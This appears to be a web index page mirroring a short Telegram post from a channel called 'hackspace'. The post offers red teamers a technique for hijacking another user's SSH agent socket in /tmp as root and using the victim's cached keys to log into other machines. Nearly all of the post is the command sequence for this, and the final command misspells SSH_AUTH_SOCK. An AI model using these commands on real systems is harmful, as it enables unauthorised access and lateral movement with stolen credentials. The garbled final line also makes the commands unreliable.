TGTGInsighttelegram intelligenceLIVE / telegram public index
← hackspace
View original
hackspace avatar

TGINSIGHT POST

Post #799

@hackspace

hackspace

Views64Post view count
PostedFeb 2802/28/2023, 05:52 PM
Post content

Post content

Red Teamers: SSH caches keys of ongoing sessions in /tmp; root user can hijack them and SSH to any machine the user can access. ps aux | grep ssh ls -lah /tmp SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l SH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh user@target